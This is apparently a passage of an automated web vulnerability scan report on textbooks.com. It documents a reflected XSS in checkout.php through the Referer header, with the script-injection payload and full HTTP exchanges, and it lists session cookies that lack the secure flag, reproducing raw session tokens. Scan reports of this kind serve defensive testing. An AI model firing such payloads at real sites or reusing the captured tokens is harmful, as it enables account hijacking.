Set-Cookie: TBSESSION=vS3CZTVN4V9T04BQLauyRjtj4X%2BrPBD%2B9PimBdwncVrIS3Luk1nHU9ZZbWxW330hfbihjJhimPIzFI3LK%2B4LoVnpXktxBSd9gHE5bXZs0JVchdxKbOBq8hbbUhnXxC3h%2FKfWIsgJoEDKlSGvwT%2B4GNz7rEGLFQyCztBJSb40wRYnBHMbcjyVNdu5jlPHfkqS15TJpzcmKYUzZhHHPcpmWaPwO66g0XL%2ByBZ0Dx9ILvAy09X8kC72INrVJNu%2F21zPmrfGOmUVlARk2FoOXhpOHBBl78l2SbMsFRZ6TEm8PysO9DxG0jPoD02Qnw1r1Yf9UGZ3rdCR79Ypy88DcAq%2B6XiLHUJAas2EL82n5LJ2gsbBdeXNLjn2644RrAz0CcM1mzAz2wamY6eFJxQAQpr1labZcuOGDkYzI4IlPH4tWytUv0BIf1Hx%2BxqDTAmMYIsw%2BTREyPFWPwP%2BX8%2FPZ3llaV4ecgOPZoQpZ5DnI9OSvTyLSjkcxoz%2F6wIUPtPonnLaOiqf2xPHkjKY1OmdmmgfjgU305xYtTmlwnd%2BzOQf1NxnSP6wM8EAF%2FhQ32B1VgcnTRlvhrPryCZjuNnEte%2BUJly11w9n%2B1SU0Jba8scXrbwn5BcTTIBjAihX5wLCWaNtYjq27pj4rDz7SdWe%2BnTu5oNdqbzKyDKgZz0UztP3YrFhc8pQxaiQra5y%2FWrcVCQpB6XtHYYpPw%2Fdg2fhYMsRAmIpMZWe3IqXh%2FzDftclggLuMApO%2BcX5mmXpNkP6ifZJ7Yreg%2F%2FmqDlmtjg4GlXgBZnH769Vgep3YoIBDHI4SDC1BIvP41ryzjgtE2m%2BJMqkr1REOTHAPlJ%2FMc1qsVLiH%2FKRQo9tW%2Bvm4MnJVP%2FjYXMAXY1JOUihBXWooj8ifB97iC0UzjjIositXymKhMFpIFAfG%2FloPCZnyLkWFf3XVaRngYmZeJc09eIt1PNYSm%2Bh2dgnmaYJPNe7ts%2BlD%2FtEon3Hw0B51fA8P3hE%2F509HgQfehaos%2Fd%2F9hJdnNVyOrtfNZDRTq%2BfGm2mqo1KyXrcrRYTLUNrmPYJ%2B%2F6cmtw6cMoNIlTI%2B6%2F%2BBnrOKbjMiFVM%2FrcqNWlmbNUF1Be%2BsAiRKeAUtqZibuniyrZPKhTjp1lKdklJHBi%2BvcWBItAqFa55jRTDKSUuw6F4p9MfA3N%2FOCdQDMKzBNLhB5V7VieTy70s%2BBI8YnbGqjupd%2FS8Ig3Z85G2x6iYKUhTJBUw9nX1GUUQu0ldeGOpwdBV5Xm5DrXvOAMrfgy%2BFIfLNzE%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=M%2F7AkKGVrp7Jrv9MNfg%3D; expires=Mon, 26-Dec-2011 13:52:09 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=3205f'><script>alert(1)</script>0f100bc08b9'>
...[SNIP]...

1.93. https://www.textbooks.com/checkout.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d67a'><script>alert(1)</script>0e18f25531c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;
Referer: http://www.google.com/search?hl=en&q=5d67a'><script>alert(1)</script>0e18f25531c

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:41 GMT
Content-Length: 25072
Connection: close
Set-Cookie: TBSESSION=PS%2B8EOnU68uVZdU0tH08YenwbsgLh%2BEvnBQ601Ri2xf%2Fwaylmd%2FTySncVPwJoaJblx2MlTAkkCk5HaUKjs9MMLcUbN18wkAhyA2LJ9mnnm1xev%2BXLjEkxE8XYcWScrdB%2FYM%2BcErvBVt1I4yULdpLnUCRxmCNQQrwPPJ3FhQnjFHENSHsNWjhRJd8fvwhnnNmjUDRK4pWyX3aEuVBCpOqwbdyAt6twBiCAkdRQcrkzbS7cB1tbuezJcX7DmySf5zMoGOH6ol2ZbG%2FlhTM%2FyScIi0Xa%2B759fzN9aXmU%2FVKZvDRhYjZlcIUoixhVEtbb%2B9INvHYoGUNzj5IZCugziwl8%2BgSsuAm6rFDO4N5zq05GsbbPBAljtc%2Brl%2BbFyacu7Etdu5ZNJoNbifd8yr%2BlzFZ3shsMonFogv3uk%2BvtXOCo7HAD2p0c%2BMG6cnWCc1wD8BEiqsKTCASuf9ZFwSh3CZHHe6Y%2F33h764DovoQZO9NnkbPjOBxNxlTNf6fic3YLCVS5aKYAg8lssbk2k9wnI4xLhzHZvqikXiOwSFFFq7ucQdue6CN28iOvgwTS70AQ%2BZCFkwh7wbghTqQrPB%2Bdu7lVHRxCmg1oF7s52Ko%2BdbAm%2BITqXUDFYmmWb%2FBge7caH%2B%2BKfv4fz%2B14zRrIzCGaXRK3iVeSsE1cbA25WSbX1evxGxC7aaDSuXI5N66bvhUStFLIGrgCg22C67VY1YhLP%2BzqqkqVvTDITvngkrt3Wg45ghZbkrLWKKZnuOJ5y5nx9XOXRc5HcGf36X%2FZFDqoK1YvGJ1zhBQ6Fz5pS0%2BADjmR4ITtJS4bRL8zUX9%2FK8DUemvvUZTyxCtqrcp7uaPOwvXS2J7MZmSc9vr3%2B22Tp%2B2ORewVjHxkbakF6S2gs62HdmQtguWoJlzWJNhum3igQeBP1%2FRauUt1AK0i%2FHhdiDSMWRm1bRkBPzQIaYOlukum1pMdwR8ZIiy7tsZfoK01HV8j7Pofth9rul5DF89g5Y%2F5%2FWdrlPl%2FU90YXlX64u%2F4%2BDoRO%2B%2FbZemrSZUhgQW0bXOq7qbgG1g%2BuZAoCJe%2BqfsC29Vfb8ZrTMqqN1LbR9XJU2f0ktFOSmNG%2BESkHGwRzVoTzQknkUQPh8ohWPfr%2BXS1pJY2%2B0pNV%2Baw88KyHFqhjw3kmW8HyCqNVs6UfcebYU8iOKXuxwGpyNKO8VJy1mO8CHrDIZrnj6jPa%2BoBX9E8l67RO5cPoMK8VSUEv6gxg6wGxKfpOUX4NaPQavaIo8IZwobKz739fdnZKXTfTs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=28G4JbhXcUVVlx3sm7w%3D; expires=Mon, 26-Dec-2011 13:53:41 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=5d67a'><script>alert(1)</script>0e18f25531c'>
...[SNIP]...

2. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.textbooks.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

2.2. https://www.textbooks.com/account.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

2.3. https://www.textbooks.com/checkout.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
